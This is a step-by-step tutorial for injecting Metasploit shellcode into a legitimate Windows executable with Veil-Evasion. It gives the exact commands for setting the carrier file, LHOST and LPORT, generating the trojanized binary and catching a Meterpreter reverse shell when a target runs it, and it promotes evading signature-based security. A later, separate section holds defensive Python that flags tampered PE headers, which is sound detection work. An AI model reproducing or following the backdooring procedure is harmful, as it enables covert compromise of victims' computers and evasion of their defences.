To combine an existing EXE file with a malicious payload using the Veil Framework, you utilize the Evasion module to embed functional shellcode into a legitimate executable. This method, often referred to as “backdooring,” allows the payload to hide within a carrier file that appears harmless to both the user and certain signature-based security tools. Start by launching the framework in your terminal by typing veil. Once the main menu appears, enter use 1 to navigate into the Veil-Evasion toolset. To view the available options for this specific technique, type list. You are looking for payloads that support custom shellcode injection or those specifically labeled for use with a “custom exe” template, often found in the C or Python categories.
Once you have selected a compatible payload by entering its number, you must configure the mandatory network settings. Enter set LHOST followed by your local IP address and set LPORT followed by the port you intend to use for the listener. The critical step for this method is identifying the specific option within the payload menu labeled as CUSTOM_EXE or ORIGINAL_EXE. You must provide the exact file path to a legitimate Windows executable that you wish to use as the host. For example, you might enter set CUSTOM_EXE /usr/share/windows-binaries/plink.exe. This command instructs Veil to take the functional code of the chosen utility and wrap or inject your shellcode into its structure.
After setting the path, type generate to initiate the compilation process. Veil will ask for a name for the output file; provide one and wait for the framework to finish the obfuscation and binding. Upon completion, Veil will display the directory where your new, combined executable is stored. To prepare for the connection, open a new terminal and start Metasploit by typing msfconsole. Enter use exploit/multi/handler and configure the payload, LHOST, and LPORT to match the settings used during generation. Finally, type run. When the target executes the combined file, the original program’s logic may trigger, but the embedded shellcode will simultaneously execute in the background, establishing a Meterpreter session. This method is highly effective because it leverages the digital footprint of a known, trusted application to mask the presence of the Metasploit payload.
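A defender-side check, added here as an example and not part of Veil, Metasploit or the text above: because this method redirects execution into code that was injected into a trusted utility, the resulting file usually shows structural anomalies in its PE headers (an entry point in an appended or writable-and-executable section) and no longer matches the hash of the vetted copy. The header parser, the minimal PE builder and both sample images below are constructed for this example.

```python
import hashlib
import struct
SCN_CODE, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x20000000, 0x40000000, 0x80000000  # PE/COFF section bits
SEC_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER layout (40 bytes)

def build_pe(sections, entry_rva):
    """Constructed minimal PE32+ (headers only) used as sample input; not a real binary."""
    opt = struct.pack("<HBBIIII", 0x20B, 14, 0, 0, 0, 0, entry_rva).ljust(240, b"\0")
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x22)
    dos = b"MZ".ljust(60, b"\0") + struct.pack("<I", 64)  # e_lfanew -> PE signature at offset 64
    hdrs = b"".join(struct.pack(SEC_HDR, n.encode(), size, rva, size, 0, 0, 0, 0, 0, flags)
                    for n, rva, size, flags in sections)
    return dos + coff + opt + hdrs

def parse_sections(data):
    """Return (entry_rva, [(name, rva, virtual_size, flags)]) read from the PE headers."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]   # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe_off + 40)[0]      # AddressOfEntryPoint
    secs = []
    for i in range(nsec):
        name, vsize, rva, *_, flags = struct.unpack_from(SEC_HDR, data, pe_off + 24 + opt_size + 40 * i)
        secs.append((name.rstrip(b"\0").decode(), rva, vsize, flags))
    return entry, secs

def inspect_pe(data, known_good=frozenset()):
    """Structural red flags of a carrier executable with injected code; [] means nothing found."""
    if hashlib.sha256(data).hexdigest() in known_good:
        return []  # byte-for-byte match with a vetted copy of the utility
    entry, secs = parse_sections(data)
    findings = [f"section {n} is writable and executable"
                for n, _, _, f in secs if f & SCN_WRITE and f & SCN_EXEC]
    holder = [s for s in secs if s[1] <= entry < s[1] + s[2]]
    if not holder:
        return findings + ["entry point lies outside every section"]
    name, _, _, flags = holder[0]
    if not flags & SCN_EXEC:
        findings.append(f"entry point in non-executable section {name}")
    if len(secs) > 1 and holder[0] is secs[-1]:
        findings.append(f"entry point in last section {name}, typical of appended code")
    return findings

CLEAN = build_pe([(".text", 0x1000, 0x800, SCN_CODE | SCN_EXEC | SCN_READ),
                  (".data", 0x2000, 0x200, SCN_READ | SCN_WRITE)], entry_rva=0x1100)
# Same layout plus an appended RWX section with the entry point redirected into it.
TAMPERED = build_pe([(".text", 0x1000, 0x800, SCN_CODE | SCN_EXEC | SCN_READ),
                     (".data", 0x2000, 0x200, SCN_READ | SCN_WRITE),
                     (".extra", 0x3000, 0x400, SCN_EXEC | SCN_READ | SCN_WRITE)], entry_rva=0x3000)
```

On real files, combine the structural check with a hash allowlist of the utilities you actually ship, since a modified carrier never matches the vetted copy even when its headers look plausible.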

